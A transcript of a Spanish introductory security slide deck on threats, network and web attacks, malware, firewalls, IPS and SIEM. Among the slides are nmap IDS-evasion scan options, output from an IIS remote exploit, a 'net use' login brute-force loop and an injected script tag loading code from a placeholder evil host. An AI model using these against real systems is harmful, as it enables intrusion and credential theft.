introduccion a la seguridad informatica
TRANSCRIPT
La confianza es la mejor conexiónLa confianza es la mejor conexión
La confianza es la mejor conexión
• INTRODUCCION A LA
SEGURIDAD INFORMATICA
• TIPOS DE AMENAZAS
• AMENAZAS TCP/IP
• AMENAZAS DE APLICACIÓN
• MALWARE
• RECESO
• ING SOCIAL
• TIPOS DE FIREWALL
• TIPOS DE IPS
• HEURISTICA Y AV
• SEGURIDAD WIRELESS
TEMARIO
La confianza es la mejor conexión
SEGURIDAD INFORMÁTICA
La confianza es la mejor conexión
CONFIDENCIALIDAD
INTEGRIDAD
DISPONIBILIDAD (Aviability)
CARACTERISTICAS DE UN SISTEMA SEGURO(CIA)
La confianza es la mejor conexión
ANÁLISIS DE RIESGOS
La confianza es la mejor conexión
La confianza es la mejor conexión
The Open Source Security Testing
Methodology Manual
OSSTMM
Es posible bajar el manual en español:
La confianza es la mejor conexión
SEGURIDAD EN PROFUNDIDAD
La confianza es la mejor conexión
AMENAZAS DE RED
La confianza es la mejor conexión
TIPOS DE AMENAZAS
MALWAREINFILTRACION
DDOS ATTACK
ROBO DE INFO. Phishing FRAUDES
SPAM
La confianza es la mejor conexión
• LAMERS
• USUARIO INTERNO
TIPOS DE ATACANTES
“Si conoces al enemigo y a ti mismo,
no debes de temer por los resultados
de cientos de batallas” Sun Tsu
La confianza es la mejor conexión
Vulnerabilidad y Exploit
Es la debilidad o hueco en un sistema por el cual un atacante puede utilizar
algún método para explotarla.
Un exploit es aquel proceso o software que ataca
una vulnerabilidad particular de un sistema o
aplicación.
La confianza es la mejor conexión
La confianza es la mejor conexión
CICLO DEL HACKING
La confianza es la mejor conexión
RECONOCIMIENTO
La confianza es la mejor conexión
Información Inicial enumeración
[bash]$ nslookupDefault Server: dns2.acme.netAddress: 10.10.20.2
>> set type=any>> IBW.COM
http://www.borderware.com/
http://network-tools.com/
La confianza es la mejor conexión
Enumeración de Servicios
La confianza es la mejor conexión
Es el proceso de crear un perfil completo de los recursos IT del objetivo. Internet,
Intranet, accesos remotos, extranet y Miscelaneos.
Footprinting
Search String Potential Result
c:\winnt Turns up servers with pages that
reference the
standard NT/2000 system folder
c:\inetpub Reveals servers with pages that
reference the
standard NT/2000 Internet services root
folder
TSWeb/default.htm Identifi es Windows
Server 2003 Terminal Services
accessible via browser-embedded ActiveX
control
La confianza es la mejor conexión
2
1
Encapsulámiento de Paquete TCP/IP
La data es envia sobre el stack de capas
Cada capa adiciona su header
22Bytes 20Bytes 20Bytes 4Bytes
64 to 1500 Bytes
La confianza es la mejor conexión
TCP HANDSHAKE
22
PC PC
TCP State TCP StateTCP Packet
Closed
SYN-sent
ACK-received
Established Established
SYN-received
ACK-sent
Listen
SEQ = 1000, CTL = SYN
SEQ = 750, ACK = 1001, CTL = SYN | ACK
SEQ = 1000, ACK = 751, CTL = ACK
La confianza es la mejor conexión
Sniffer
La confianza es la mejor conexión
EXPLORACION DE RED
La confianza es la mejor conexión
Uso de NMAP www.nmap.org
Es un escaneador de puertos (Port Scanner) - nos indica que puertos están
abiertos en una dirección IP. Es herramienta de línea de comando, se puede
instalar en Windows o Linux.
Los atacantes lo usan para descubrir que puertos tenemos abiertos en nuestros
equipos.
Importante recordar que cada puerto es un punto de ingreso al sistema por lo
cual tenemos que es asegurarnos que solo los puertos necesarios están abiertos
en nuestros servidores en la DMZ.
Tenemos que usar Nmap de regularmente y fijar que puertos tenemos abiertos.
Existen varios escaneadores de puertos, Nmap es el mas popular por su
variedad de comandos
La confianza es la mejor conexión
Uso de NMAP www.nmap.org
La confianza es la mejor conexión
Uso de NMAP www.nmap.org
Nmap 10.0.0.1 Nmap escaneara el IP 10.0.0.1,si no se le indica que puertos escanear nmap
escaneara 900 puertos mas populares.
• Nmap –p 80 www.cisco.comcon la opción –p indicamos el puerto. Nmap verificara si puerto 80 esta abierto
en www.cisco.com
• NMAP –p 80,21,1433 10.0.0.1/24
nmap escaneara todo el rango 10.0.0.1/24 y verificara si los puertos 80,21,1433
estan abiertos en cada IP.
La confianza es la mejor conexión
Uso de NMAP www.nmap.org
Nmap –sS –p 80 www.cisco.com
Nmap no enviara el tercer paquete (ACK) de esa forma no se complete el 3 Way
Handshake y no se establece la conexión. De esa forma el atacante intenta
ocultar el escaneo de puertos para no ser detectado por el Admin del servidor.
esta opción de escaneo se usa también para evitar detección por un IDS/IPS
La confianza es la mejor conexión
Uso de NMAP www.nmap.org
Nmap –T0 -p 80,21,1433 www.cisco.com
Para evitar detección por un IPS/IDS se puede controlar la
velocidad que Nmap envié los SYN ,se puede configurar
- T 0-5 cuando el 0 es el mas lento, NMAP esperara 5
minutos entre cada envio de paquete SYN la opción 5 es
la mas rápida por defecto Nmap escanee –T3 si no se
menciona ninguna opción de velocidad.
La confianza es la mejor conexión
30
Ataques de RED (L2/3/4)
Denial of Service (DoS)SYN flood
Smurf
Distributed DoS
SpoofingIP spoofing
ARP poisoning
Web spoofing
DNS spoofing
La confianza es la mejor conexión
Sniffer
• La existencia de un sniffer en la red interna o la DMZ puede
indicar que el servidor fue comprometido o que un empleado esta
capturando informacion en la red interna que no le corresponde.
• Uno de los primeros pasos que va hacer un hacker despues que
compromete un servidor sera instalar un sniffer local
La confianza es la mejor conexión
SPOOFING Y SOURCE RoutingEl origen de un dirección IP puede ser cambiadoAddress spoofing
Usando direccion fuente para autenticaciónr-utilities (rlogin, rsh, rhosts etc..)
Internet
2.1.1.1 C
1.1.1.1 1.1.1.2A B
1.1.1.3 S
• A dice ser B para el server S?
• Spoofing
• C pasar por B para el server
S?
•Source Routing
La confianza es la mejor conexión
Ejemplo de robo de sesión (Session Hijack)
Alice Bob
Eve
Soy Bob! Soy
Alice!
1. Eve se convierte en hombre en medio a través de algun mecanismo. Por Ejemplo: Arp Poisoning, social engineering, router hacking etc...
2. Eve puede monitorear tráfico entre Alice y Bob sin modificar secuencias ni parametros.
3. Eve puede asumir la identidad de Bob o Alice a traves de hacer Ip Spoofing. Esto rompe la pseudo conexción a medida que Eve comienze a modificar el número de secuencia
La confianza es la mejor conexión
Denegación de servicio(DoS)
(DDoS)
Objectivo Deniega algún servico corriendo enuna máquina, usualmente se realiza haciendosobrecarga en el server o RED
Consumo de recursos del HostTCP SYN floodsICMP ECHO (ping) floods
Consumo de ancho de bandaUDP floodsICMP floods
La confianza es la mejor conexión
35
Ping de la muerte
El atacante envia paquetes ilegales de eco con mas bytes de lo permitido, causando fragmentación de datos. El exceso de datos guardados causa buffer overflows, kernel dumps, y Bloqueos de sistema.Esto se hace posible por ciertos Windows OSs quepermiten non-standard ICMP (Internet Control Message Protocol)El largo del paquete máximo ICMP es 65507 bytes. Cualquier paquete de eco que lo exceda causa fragmentacion y el receptor trata de reconstruir el paquete almacenandolo en buffer hasta desbordarlo.
La confianza es la mejor conexión
Ping Flood
Sistema atacante
Internet
Broadcast
Enabled
Network
Victima
La confianza es la mejor conexión
•SYN FLOOD ATTACK
TIPOS DE DENEGACION DE SERVICIO
La confianza es la mejor conexión
Ataque de DDoSServer
Atacante
Usuarios Legítimos
Interweb
Ips comprometidas
Service Requests
Conexiones Flood del atacante
Cola del Server llena, Deniega servicio a los
usuarios legítimos
Clientes solicitando Servicios
La confianza es la mejor conexión
ATAQUE DE SMURF
La confianza es la mejor conexión
40
UDP-flood attack
Variante de DoS
Envia a la maquina viCtima servcios de eco(haciendo Spoofing) para crear
loops infinitos entre dos Servicios UDP
No se requiere tener una cuenta basta con la conectividad.
Ip source= victimip, ip destination192.168.1.255
Ip source 10.0.1.2 ip dest]=10.0.1.3
La confianza es la mejor conexión
Ataques de capa de aplicación
La confianza es la mejor conexión
Un overflow es, básicamente, cuando resguardamos espacio de memoria
insuficiente para una variable y le introducimos más datos a de los que puede
soportar. La variable "desborda", y los datos que no caben
sobrescriben memoria continua a dicha variable.
Ejemplo: Declaramos 8bytes
Insertamos 10bytes
2 bytes restantes sobre rescriben la memoria contigua a dicha variable
BUFFER OVERFLOW
La confianza es la mejor conexión
Denegación de servicio (aplicación o sistema)
Inyección de código de manera estructurada sobre una aplicación o sistema
de manera que tome control de algún shell msdos , terminal, remote desktop.
Ataques Buffer Overflow
C:\>iisexploit www.site.com myserver 8082
THCIISSLame v0.3 - IIS 5.0 SSL remote root
exploit
tested on Windows 2000 Server german/english
SP4
by Johnny Cyberpunk ([email protected])
[*] building buffer
[*] connecting the target
[*] exploit send
[*] waiting for shell
[*] Exploit successful ! Have fun !
La confianza es la mejor conexión
Es una forma especializada de validación de entradas
que intenta manipular la base de datos de la aplicación
lanzando sentencias SQL codificadas a dicha aplicación
aprovechando vulnerabilidades de la programación.
INYECCION SQL
La confianza es la mejor conexión
Es la vulnerabilidad mas comun de los sitios Web!
Es una brecha en el desarrollo del sitio Web no es un problema de la base de
datos o del Server Muchos programadores lo pasan desapercibido.
Muchas aplicaciones reconstruyen los queries con concatenación de caracteres.
Los programadores no hacen validación de entradas según el campo.
Inyección SQL
La confianza es la mejor conexión
Cross-Site Scripting (XSS)
Brinda oportunidades de ingeniería social para los phishers
Generalmente se usa en conjunto con ataques DbD
En Abril, la Fundación Apache fue hackeada con XSS
Cross-Site Scripting (XSS): En general, una técnica de ataque que permite al atacante ejecutar un script en la computadora de la víctima bajo el contexto de otro sitio web que la víctima confía. Este ataque explota la confianza que el usuario tiene por un sitio particular.
La confianza es la mejor conexión
ATAQUES XSSXSS Vulnerabilidad que afecta un Sever pero la victima final son los usuarios
El atacante injecta
Javascript en submit
El usuario se loguea y corre el
script en el submit
El servidor responde
con el scriptEl javascript se ejecuta
en el bwoser del user
El browser del usuario envia el
token de la session al atacante
El atacante roba la session del
usuario
La confianza es la mejor conexión
Ataques de Diccionario
Ataques de Fuerza bruta
Ataques de Autenticación
C:\>FOR /F "tokens=1,2*"
%i in (credentials.txt)^
More? do net use
\\victim.com\IPC$ %j
/u:victim.com\%i^
More? 2>\>nul^
More? && echo %time%
%date% >\> outfile.txt^
More? && echo
\\victim.com acct: %i pass:
%j >\> outfile.txt
La confianza es la mejor conexión
Ataques de autenticación Fuerza Bruta
La confianza es la mejor conexión
Drive-by Downloads (DbD)
DbDs, ahora más destacado que lasamenazas nacidas en el e-mail
Los criminales venden y soportan esquemasde ataques web fáciles de usar
Sophos encuentra cerca de 30,000 nuevossitios maliciosos cada día
Drive-by download (DbD): Es cuando el malware es bajado por la fuerza en su computadora sin su conocimiento o interacción. Tipicamente ocurre cuando un sitio maliciosos explota una vulnerabilidad de seguridad basada en el browser para forzar a su computadora a ejecutar código que baja malware.
La confianza es la mejor conexión
Ataques Web Combinados
DBDB
Parte 1: Ataque automatizado SQL InjectionParte 2: Drive-by Download
<iframe><script src=“http://EvilWebSite.cn/EvilJavaScript.js”></scirpt></iframe>
La confianza es la mejor conexión
•Proceso manual o automatizado que trata de encontrar
vulnerabilidades en una red o servicio.
•Puede ser hasta del tipo intrusivo y aplicar exploit al
sistema escaneado.
•Herramienta de gran ayuda al administrador de red pero
maligno en manos de terceros (HACKERS).
ESCANEO DE VULNERABILIDADES
La confianza es la mejor conexión
Ataque de Dia Cero
Ventana de Vulnerabilidad
La confianza es la mejor conexión
MalwareMalicious softwareSoftware malicioso
Algunos tipos de Malware: Adware Troyano Dialer Hijacker Keylogger Phishing Spam Spyware Ventanas emergentes Virus Worms o gusanos ...
Lo más común es que aparezcan combinados
54
Clasificación del Malware
La confianza es la mejor conexión
Tipos de Virus
Polymorfico: Usa un motor polymorfico para mutar en su codigo mientras
mantiene intacto su algoritmo original (packer)
Methamorfico : Cambia después de cada infección
MalwareHost infectado
Executable
Packer
Payload
La confianza es la mejor conexión
Malware Worms o gusanos
¿Qué es? Programa autoreplicante que no altera los archivos del sistema sino que reside en la memoria y se duplica a sí mismo enviándose por email o a través de la red.
¿Cómo se evita? Teniendo activo el firewall Actualizando windows regularmente. Comprobando que el antivirus está actualizado y activo.
56
La confianza es la mejor conexión
La palabra Adware nace de la contracción de las palabras Advertising Software (publicidad no solicitada).
Despliega publicidad sobre productos y/o servicios a través de pop-ups o barras que se adhieren a los navegadores. Doubleclick, Cydoor, Gator Corporation.
Clasificación del Malware
Malware Adware
¿Qué es? Software que durante su funcionamiento muestra publicidad de distintos productos o servicios.
¿Cómo se evita? No usar software de dudoso origen No visitar páginas web de dudoso origen.
La confianza es la mejor conexión
Los troyanos simulan ser inofensivos, útiles y benignos pero en realidad esconden funcionalidades maliciosas.
Suelen acceder a la computadora simulando ser la demo del anticipo de algún juego, en un mensaje de correo electrónico e incluso mediante aplicaciones de mensajeria instantánea
Malware Troyano
¿Qué es?• Software dañino disfrazado de software legítimo que permite que un extraño controle nuestro PC.
¿Cómo se evita? No usar SW de dudoso origen Escanear con el antivirus cualquier dato o programa recibido. Comprobar que el antivirus está actualizado y activo.
La confianza es la mejor conexión
Tipos de troyanos
Troyano backdoor: habilita un canal de acceso no convencional en el sistema permitiendo que otros códigos maliciosos y/o personas accedan al mismo cuantas veces quieran.
Troyano drooper: se caracteriza por ejecutar otros códigos maliciosos al momento de su ejecución.
Troyano keylogger: monitorea y registra todo lo que se teclea. Muchos de ellos poseen la capacidad de capturar imágenes y videos.
Troyano bancario: orientados a la ejecución de ataques de phishing. Manipulan a la víctima para que de manera “voluntaria” brinden información sensible. En muchos casos realizan pharming local.
Troyano downloader: se caracteriza por descargar otros códigos maliciosos mientras se encuentra activo.
Troyano bot: convierte una computadora en zombi. Cada una de estas computadoras zombis formarán parte de redes botnet.
La confianza es la mejor conexión
Ejemplos de troyanos y gusanos
La confianza es la mejor conexión
Rootkits
Rootkits pueden esconder virtualmente todo:
Procesos
Files, directories, Registry keys
Servicioss, drivers
TCP/IP ports
rootkit technology:
User-mode hooking
Kernel-mode hooking
Codigos de Parche
Escondidos sobre otros procesos
La confianza es la mejor conexión
El Spyware (Spy Software) tiene como objetivo recolectar información sobre una persona u organización. Crea perfiles de usuarios con información sobre sus hábitos de navegación.
La información se distribuye a empresas publicitarias u organizaciones interesadas. Bonzo Buddy, Alexa, Hotbar.
Los programas Rogue son aplicaciones del tipo shareware que simulan ser herramientas de seguridad e instalan adware y/o spyware.
Despliegan alertas exageradas sobre supuestas infecciones incentivando al usuario a adquirir dicha aplicación.
La confianza es la mejor conexión
Botnets: Lo último en amenazas mezcladas
Distributed Denial of Service (DDoS)
Spamming
Phishing
Click Fraud
Robo de ID (a escala masiva)
Password Distribuido/hash cracking
Instalar malware adicional
Acceso de Puerta Trasera
Keylogging / espiar a la víctima
Robar credenciales
Proxy a través de la víctima
Apalancamiento en la mayoría de ataques
Los Botnets son la Navaja Suiza
del mundo del malware, y los que
los usan tienen muchas hojas de
donde escoger.
La confianza es la mejor conexión
Zeus v3 (Zbot), Mpack, Zunker
• Viene como un kit de crimeware pre-empaquetado
• Muy orientado a ataques bancarios en linea
• Roba credenciales de Bancos y RedesSociales
• Genera páginas de phishing localmente (web page injection)
• Responsable de muchos ataques de malware
• Algunos estiman que ha infectado a 1 de cada 100 computadoras
• Chequee: https://zeustracker.abuse.ch
La confianza es la mejor conexión
ATAQUE DE INGENIERIA SOCIAL
La confianza es la mejor conexión
Ingeniería Social
“Usted puede tener la mejor tecnología, los mejores firewalls, los mejores sistemas de detección de intrusos o los mejores dispositivos biométricros. Lo único que se necesita es un llamado a un empleado desprevenido e ingresar sin más”
Kevin D. Mitnick
La confianza es la mejor conexión
PISHING
La confianza es la mejor conexión
PISHING
La confianza es la mejor conexión
Malware e Ing.Social combinados en Facebook (Koobface)
La confianza es la mejor conexión
lEs una especie de Hacking y Phishing avanzada en el que se envenenan los registros de servers DNS o los registros Host de la PC
•http://google.com
•Sever Google.com
•Server Fraudulento
•Flujo Normal a la ip de Google
•Resolución envenenada hacia Ip del server de Fraude
PHARMING
La confianza es la mejor conexión
Ing. Social y Falso Antivirus(rogue)
La confianza es la mejor conexión
AMENAZAS PERSITENTES AVANZADAS
An Advanced Persistant Threat (APT).
Three APT
Atributos:1. Avanzada
2. Persistente
3. Polymorfa
4. Focalizadas
La confianza es la mejor conexión
SEGURIDAD DE PERIMETRO
• Filtrado de paquetes (Mínimo y básico)
• Firewalls
• Filtro de contenido (Web y correo)
• Antimalware
• IPS
• NGF
• UTM
• WAF
La confianza es la mejor conexión
¿Dónde opera un Firewall?
Punto de conexión de la red interna con la red exterior
Zona Desmilitarizada (DMZ)
La confianza es la mejor conexión
Tipos de Política de Entrada(Filtros INGRESS) y Salida (Filtros EGRESS)
Los filtros de salida o Egress son métodos de filtrar tráfico desde
la red interna hacia afuera o hacia redes externas (LAN hacia WAN).
Los filtros de entrada o Ingress son métodos de filtrar tráfico
desde las redes externas hacia las redes internas (WAN hacia LAN).
La confianza es la mejor conexión
Políticas de Filtrado de
Paquetes de Estado (Stateful)
Siguen el rastro de las sesiones de los paquetes TCP,rastreo de origen, destino de direcciones y puertos.Evita robo de sesion, spoofing y conexiones anormalesen tcp utilizadas por escaneos.
Mantiene el control del estado de sesiones TCP/UDPincluyendo el re-ensamble de paquetes tcp e icmp. Nopermitiendo el paso de ataques fragmentados queexploten a la hora de unirlos.(Ej ping de la muerte oalgun tipo buffer overflow).
Soporta autenticación y timeouts de sesiones.
La confianza es la mejor conexión
Ejemplo de Filtrado de Paquetes de Estado
La confianza es la mejor conexión
Politicas Stateful Inspection
En la mayoria de las comunicaciones TCP (normales), lascomputadoras inician lo que es llamado “3-way handshake (TCP)”
Hola mi nombre es Pedro(SYN)
Hola Pedro, mi nombre es Jose (SYN/ACK)
Mandame tus datos (ACK)
Un firewall “Stateful” inspection monitorea estas conexiones
NO LOS DATOS, solo la información de las conexiones
client.com.4567 > server.com.21: S 1234567890:1234567890(0)server.com.21 > client.com.4567: S 3242456789:3242456789(0) ack1234567890client.com.4567 > server.com.21: . ack 1
La confianza es la mejor conexión
Conexión anormal en un Filtro de Estado
A stateful inspection firewall “inspects” the “handshake”
Adios Jose, mi nombre es Pedro (END)
Hola Pedro, mi nombre es Jose (SYN)
Adios Pedro, mi nombre es Jose (End)
Si hay algo anormal en la comunicación,
el firewall bota o ignora la conexión.
La confianza es la mejor conexión
FILTRADO PUERTAS TRASERAS
Solo se debe abrir los puertos necesarios a través del fw.
Solo se permite puerto DNS a los destinos confiables
La confianza es la mejor conexión
Limitantes de los Filtros de Estado
No logran revisar el contenido de la aplicación delpaquete en su totalidad
No detienen exploits basados en anomalias deprotocolos de capa de aplicación como HTTP y FTP(Buffer overfolw sobre aplicacion o headers anómalos)
Son más eficientes pero menos proactivos a la hora dedetener un ataque de dia zero (hasta nivel de capa 4)
No evitan conexiones salientes o entrantes por puertosconocidos como HTTP o POP3 que no hablen dichoprotocolo (conexión de troyanos o botnets que ocupenprotocolos de trabajo como el http,smtp,dns etc)
La confianza es la mejor conexión
Políticas de filtrado Alg o Proxy
Actúa dentro de los niveles de transporte yaplicación (circuit level gateway yapplication gateway respectivamente)según el modelo TCP/IP
Procesa, valida y regenera cada paqueterecibido; impidiendo la conexión directaentre 2 redes diferentes
Para cada servicio (telnet, ftp, http...) seutiliza un proxy específico, pudiendo asíprohibir el uso de determinadas órdenesde un servicio
4 Transporte
5 Aplicación
3 IP
2 Data Link
1 Físico1 Físico
Application gateway
La confianza es la mejor conexión
Diferencia entre Statefull y Proxy
Firmas de AV/IPS Firmas de AV/IPS
La confianza es la mejor conexión
Web Server
Cuando la conexión es a través del Packet Filter
1. La conexión se crea en el cliente
2. Va a través del Firewall
3. La conexión termina en el Server
El firewall monitorea la conexión y aplica las reglas a nivel de capa 3 y 4
Conexión Packet Filter
La confianza es la mejor conexión
Web Server
Cuando la conexión es a través del Proxy
1. La conexión es creada en el cliente
2. La conexión termina en el firewall
3. Todos los aspectos de la conexión son revisados
4. Las conexiones creadas en el firewall son re-ensambladas
5. La conexión final se manda al Server
Conexión Application Proxy
El proxy revisa el protocolo a nivel de capa deaplicación; en algunos casos también revisaheaders, comandos, buffers, codificación deaplicaciones, encriptado (HTTPS), descartando loque no es normal a nivel de capa de aplicación.
MAS QUE UN DEEP PACKET INSPECTION
La confianza es la mejor conexión
Firewalls de Filtro de Estado
Basados solamente en firmas
5 – Protocolo AnómaloXxysws
Ertws&3
sw@!hd
We*@z!
SW@(f&
8 – Queries DNSA Record
NS
CNAME
SOA
PTR
MX
AAAA
AXFR
Nuevos Exploit s DNS salendiariamente. Proxy los detiene
sin conocer las firmas
Diferencia significativa de Escaneo
Ejemplo de Protección dia ZERO
(DNS Exploit)
La confianza es la mejor conexión
Limitantes de los filtros Proxy
Los Proxy no son compatibles con todos los protocolosde red existentes
Hay reducción en el rendimiento del equipo y lasconexiones debido al procesamiento más intenso en elescaneo; sin embargo puede balancearse conincremento de recursos
La configuración del proxy es más dificultosa que unpacket-filter
Algunos proxy no hacen escaneo tan minucioso delprotocolo
La confianza es la mejor conexión
Limitantes del Firewall en la seguridad de Perímetro
PORT 80
PORT 443
El ataque es un exploit a
nivel de aplicacion sobre
una vulnerabilidad
La seguridad Perimetral permite
solo puertos de trabajo
Buffer Overflow
Cross-Site Scripting
SQL/OS Injection
Cookie Poisoning
Hidden-Field Manipulation
Parameter Tampering
!Host
comprometido
!Comunicacion
centro de
comandos
Salida de una puerta
Trasera a traves
del firewall
!Acceso
forsado a la
informacionPero esta abierto a
trafico Web y Dns
La confianza es la mejor conexión
IPS (Intrusion Prevention System)
La confianza es la mejor conexión
IDS =Intrusion Detection System=Pasivo
Cuando detecta ataque solo Alerta
IPS =Intrusion Prevention System=Activo
Cuando detecta un ataque lo Bloquea
La confianza es la mejor conexión
•NETWORKS (Recolecta la info de LA RED)
•HOST (Software agente en un Host)
•SIGNATURE DETECTION (Firmas de ataques y Malware)
•ANOMALY or Behavior DETECTION (Detecta patrones anormales
TIPOS de IDS (Intrusion Detection System)
IPS (Intrusion Prevention System)
La confianza es la mejor conexión
IDS basados en firmas
CaracteriticasUsa patrones conocidos de firmas para detectar ataquesVentajas?Ampliamente disponibleRapidoFácil de implementarFácil de actulizarDesventajas?
No detecta ataques que no estén
en firmas.
La confianza es la mejor conexión
Falsos positivos
.
Falso positivo= detecta trafico normal como ataque.
Falso negativo= no detecta un ataque real.
Los IDS/IPS generan miles de falsos positivos.
Uno de los problemas que vemos en nuestros clientes es que ellos
piensan que los IDS/IPS son como en Anti Virus que no requiere mucho
administracion
Conocemos varias empresas que por tener tantos falsos positivos
Apagaron el equipo y no lo usan mas!!
La confianza es la mejor conexión
IDS-IPS basado en Comportamiento
CarateristicasUsa modelos estadísticos o motores de aprendisaje para caracterizar ambientes
normales de uso
Reconoce trafico anormal como intrusiones potencialesVentajas?Podría detectar intentos de nuevos exploit sobre vulnerabilidades sin firma.Puede detectar autorizaciones fuera del patrón normalDesventajas?Generalmente lento, necesita recursos intensivos comparado con el signature-based IDS
Gran flexibilidad, dificultad al configurar
Altos portcentajes de falsos positivos
La confianza es la mejor conexión
IPS hibridos
Hoy en dia existen en el mercado IPS’s que
estan basados en firmas y ademas tienen
capacidad de “Anomaly Detection” estos
son los mas caros pero tienen las ventajas
de ambos mundos
La confianza es la mejor conexión
•CONSOLA DE ADMINISTRACION: Configura y
• presenta la información recolectada por los sensores.
•SENSORES: Análisis de tráfico y firmas, Alarmas,
• Respuestas y contramedidas.
NETWORK IPS
La confianza es la mejor conexión
Network IPS
Internet o Wan
DMZ
LAN Servidores Internos
Segmentación de Red en
zonas
LAN DMZ
SERVER INTERNOS
INTERNET
La confianza es la mejor conexión
Host Intrution Detection Systems (HIDS)
los HIDS son agentes que se instalan en los servidores (en
general en la DMZ).
Los HIDS son un complemento de los IDS/IPS. Detectan
cualquier actividad del atacante en el servidor mismo; el HIDS
Alerta si se borraron los logs, si se habilito un nuevo servicio en
el servidor o si creo un muevo usuario en el sistema. Para un
atacante es imposible no ser detectado por el HIDS
**** Tenemos varios clientes que instalan solo los HIDS y no
colocan el NIDS
La confianza es la mejor conexión
NGFWsNext Generation Firewall
IPS APPLICATION
CONTROL
La confianza es la mejor conexión
FIREWALL UTM
( MANEJO UNIFICADO DE AMENAZAS)
• CONTROL DE APLICACIÓN
• WEB FILTER POR CATEGORIA
• IPS PERIMETRO
• AV PERIMETRO
• REPUTACION DE IP
• VPN
• ANTI SPAM
La confianza es la mejor conexión
WAF(Web application Firewall)
La confianza es la mejor conexión
ANTI MALWARE
La confianza es la mejor conexión
CONSOLA CENTRALIZADA
La confianza es la mejor conexión
HEURISTICA = PROTECCION DIA ZERO
Encontrar una solución por prueba y error o por reglas basadas en la experiencia.
La confianza es la mejor conexión
HEURISTICA PASIVA
Su Analiza programas tratando de encontrar código anómalo antes de pasarlo a correr en el proceso central.Busca patrones de
subrutinas,o llamadas de programas que indiquen comportamiento malicioso.
La confianza es la mejor conexión
HEURISTICA ACTIVA
Su El motor ejecuta el código en un ambiente Virtual controlado”SandBox”.Analizando los cambios en el entorno virtual.
La Heurística Activa puede detectar código malicioso encriptado, codificado compresión y código polimorfo
La confianza es la mejor conexión
Av comparatives test de laboratorio
La confianza es la mejor conexión
VIRUS BULLETIN RAP(Reactive Proactive
Reports)
La confianza es la mejor conexión
EJEMPLOS DE AMENAZAS DE SEGURIDAD WI-FI
La confianza es la mejor conexión
WPA/WPA2/MAC Filter Son esenciales – Pero No son suficiente
La confianza es la mejor conexión
CRACK Y EXPLOIT WIRELESS
La confianza es la mejor conexión
Autenticación 802.1x
La confianza es la mejor conexión
WIPS(WIRELESS INTRUSION PREVENTION SYSTEM)
La confianza es la mejor conexión
SEGMENTACIÓN DE TRÁFICO ,
BLOQUEO DE PUERTOS , IPS
La confianza es la mejor conexión
WLAN ADMINISTRADA
• Roaming
• Admin Central
• Multiples SSID
• VLAN
• WMM (Voz, Video)
• QoS
• Seguridad
• Monitoreo y logs
• Standarización
• WIPS
La confianza es la mejor conexión
Porqué Soluciones Administradas
Algo que sabe(preguntas)
Algo que tiene (tokens, identificaciones, carnets)
Algo que es (biométrica, retina, huellas digitales, voz, etc)
https://howsecureismypassword.net/
La confianza es la mejor conexión
VISUALAIZACION DE DATOS
La confianza es la mejor conexión
• Casi imposible de identificar factores o patrones clave • Para el personal IT de seguridad de red es un arduo trabajo• Incapacidad para tomar decisiones adecuadas • Falla de cumplimiento de la normativa o regulaciones
GRANDES CANTIDADES DE LOGS DE DATOS
Los datos por si mismo no tienen valor
tangible . El valor lo da el analisis sobre
ellos y como estos datos son
transformados en informacion y
eventualmente en conocimiento.—Mark van Rijmenam
La confianza es la mejor conexión
SIEM (Security Information and Event Management)
Security Logging—SANS Survey
Las soluciones SIEM son usuadas para colectar logs de multiples fuentes
•Excelente para usarse en OS, Database, Application, Router, Firewall, UTM
•Los usuarios SIEM reconocen el valor del análisis de datos y correlación de información
•Estos son dificiles de desplegar y gastan tiempo de IT
https://www.sans.org/reading-room/analysts-program/SortingThruNoise
77% 10%24%
La confianza es la mejor conexión
Le da al administrador un parámetro de
la sanidad de la red.
Nos da información del tráfico que circula
en nuestra red y si tenemos los recursos
apropiados
Nos permite hacer análisis de
congestiones o problemas de la red
Nos permite darnos cuenta quien y que
escanea mi red
"NO PODEMOS CONTROLAR LO QUE NO
VEMOS”
Para que nos sirven las Herramientas de Visualización de
la Red
La confianza es la mejor conexión
Cuando los sistemas basados en firmas y heurísticas
han fallado, al final el ser humano ha identificado
las amenazas con herramientas de monitoreo.
Identificación de Amenazas
La confianza es la mejor conexión
“Más del 95% de las vulnerabilidades de los firewall son
causadas por mala configuración de los mismos, no por
defectos de los equipos”
-Gartner, 2011
La confianza es la mejor conexión
RECOMENDACIONES DE SEGURIDAD
• Establecer Políticas de seguridad
• Establecer sitios de contingencia y backups
• Establecer un plan de desastres y recuperación
• Actualizar firmas y parches
• No dejar abiertos servicios innecesarios
• Contar con tecnología apropiada
• Estar actualizado sobre nuevas amenazas
• Educar a los usuarios en materia de seguridad
• Poseer un plan de seguridad
• No ver los sistemas de seguridad como cajas negras..
La confianza es la mejor conexión
Gracias !!!